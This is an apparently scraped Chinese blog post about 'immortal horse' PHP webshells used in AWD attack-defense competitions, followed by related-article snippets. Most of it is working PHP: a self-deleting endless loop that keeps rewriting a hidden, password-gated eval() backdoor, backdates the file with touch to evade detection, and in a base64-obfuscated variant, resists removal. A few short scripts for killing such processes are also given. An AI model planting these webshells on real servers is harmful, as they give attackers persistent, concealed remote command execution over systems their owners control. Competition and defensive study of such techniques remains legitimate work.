7.awd不死马权限维持及变种
不死马又叫内存马,就是运行一段永远不退出的程序常驻在PHP进程里,无限执行。
不死马.php—>上传到server—>server执行文件—>server本地无限循环生成
(一句话.php)
不死马生成的一句话木马可以自定义。
<?php
ignore_user_abort(true); //函数设置于客户机断开后,不会终止脚本的执行
set_time_limit(0); //设置脚本的最大执行时间,0代表无限制
unlink(__FILE__); //删除文件本身 (隐藏的效果)
$file = './.index.php'; //生成的一句木马的文件名
$code = '<?php if(md5($_POST["pass"])=="e771c5bd0272757ce1a75fb6c35528cb"){@eval($_POST[v]);} ?>';
//一句话木马的内容,这个是可以改变的
//pass=dhskanf 马儿用法:fuckyou.php?pass=dhskanf&v=command
while (1){file_put_contents($file,$code);system('touch -m -d ""2018-12-01 09:10:12" .index.php');//touch -m 修改文件时间,让防守方无法通过find命令来找到不死马文件。usleep(1);
}
?>
KILL不死马的方法:
1.重启系统
2.kill进程
<?php
while (1) {$pid = 不死马的进程PID;@unlink(".ski12.php");exec("kill -9 $pid");usleep(1000);
}
?>
3.竞争写入无意义的一句话
<?php
set_time_limit(0); //PHP脚本限制了执行时间,set_time_limit(0)设置一个脚本的执行时间为无限长
ignore_user_abort(1); //ignore_user_abort如果设置为 TRUE,则忽略与用户的断开,脚本将继续运行。
while(1)
{ file_put_contents('shell.php','1111111'); //创建shell.php usleep(0); //间隔时间
}
?>
不死马的变种
多了条件判断,不容易别人条件竞争。
<?phpignore_user_abort(true);set_time_limit(0);$file = 'c.php';$code = base64_decode('PD9waHAgZXZhbCgkX1BPU1RbY10pOz8+');//一句话木马base64加密<?php @eval($_POST[c]);?>while(true) {if(md5(file_get_contents($file))===md5($code)) { //获得文件内容与参数code进行比较,条件判断file_put_contents($file, $code);}usleep(50);}
?>
7.awd不死马权限维持及变种相关推荐
- Windows权限维持之php不死马、映像劫持、策略组脚本
文中主要讲解Windows权限维持中的小技巧,通过了解掌握php不死马.映像劫持.策略组脚本等方式,更快知晓权限维持作用.本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若 ...
- 渗透测试-不死马的创建和查杀
不死马的创建和查杀 文章目录 不死马的创建和查杀 0x00 创建 0x01 查看 0x02 查杀 root用户角度的查杀: 重启web服务. 其他用户的查杀: 0x00 创建 md5加密密码: 代码: ...
- 不死马php如何取证_AWD不死马与克制方法
一个简单的不死马如: ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = '.3.php'; $code = ' ...
- AWD-----监控不死马垃圾包资源库
1.知识: AWD规则: 2.防守-----流量监控-----实时获取访问数据包流量 利用 WEB 访问监控配合文件监控能实现 WEB 攻击分析及后门清除操作,确保写入后门操作失效,也能确保分析到无后 ...
- 关于PHP不死马的分析和总结
PHP不死马是我们达到权限维持的目的. 不死马的原理: 由客户端发起的Web请求后,中间件的各个独立的组件如Listener.Filter.Servlet等组件会在请求过程中做监听.判断.过滤等操作, ...
- 专访死马:为什么说Egg.js是企业级Node框架
在 7 月 6 日的 ArchSummit 架构师峰会深圳站上,Egg.js 的主要开发者不四(网名死马)将给参会者带来<企业级 Node.js Web 框架研发与落地>的分享,借此机会, ...
- awd的批量脚本 pwn_AWD攻防之web入门篇
前言 AWD(Attack With Defense,攻防兼备)模式是一个非常有意思的模式,你需要在一场比赛里要扮演攻击方和防守方,攻者得分,失守者会被扣分.也就是说,攻击别人的靶机可以获取 Flag ...
- 记第一次线下AWD感受及复现
前言: 之前忙于期末复习,没有及时总结当时参赛的感受及复现,这次就来总结一下. 第一次参赛线下AWD感受 由于是第一次参加AWD比赛,各方面经验都不足,在参赛的前几天也是疯狂搜集各种脚本.框架.工具等 ...
- 第80天-红蓝对抗-AWD 模式准备攻防监控批量
思维导图 何为AWD 比赛中每个队伍维护多台服务器,服务器中存在多个漏洞,利用漏洞攻击其他队伍可以 进行得分,修复漏洞可以避免被其他队伍攻击失分. 一般分配Web服务器,服务器(多数为Linux) 某 ...
最新文章
- 最短路问题的原始对偶算法形式
- mysql 多主多从配置,自增id解决方案
- 2022-03-22
- 房价越高的地方资产越高?北京户均资产890万?
- C语言使用1到9求出所有k个数字的所有组合的算法(附完整源码)
- 【BZOJ3611】【HeOI2014】—大工程(虚树+dp)
- 《微软开源跨平台移动开发实践》团购通知
- ip转换器哪个好用_中英文翻译软件哪个好?试试这两个就知道了
- .Net Micro Framework移植基础(包编译通过)
- python属于汇编语言还是高级语言_python语言属于汇编语言吗?_后端开发
- Android tv upnp播放器,TV Connect: AirPlay, DLNA
- springboot快速搭建ftpserver服务端
- Pytorch机器学习(六)——YOLOV5中的自适应图片缩放letterbox
- ggplot2_coor_xxx()坐标系变换
- 假如工资有段位,你是个啥?
- 发现新词 | NLP之无监督方式构建词库(一)
- STemWin专题--画直线
- 跨越AI大门,一本翻译蓝皮书、一场人机共译比赛投射出怎样的未来?
- 中兴通讯能制造服务器吗,中兴通讯服务器搭载“黑匣子”功能,让故障无处遁形...
- MacBookPro M1芯片安装brew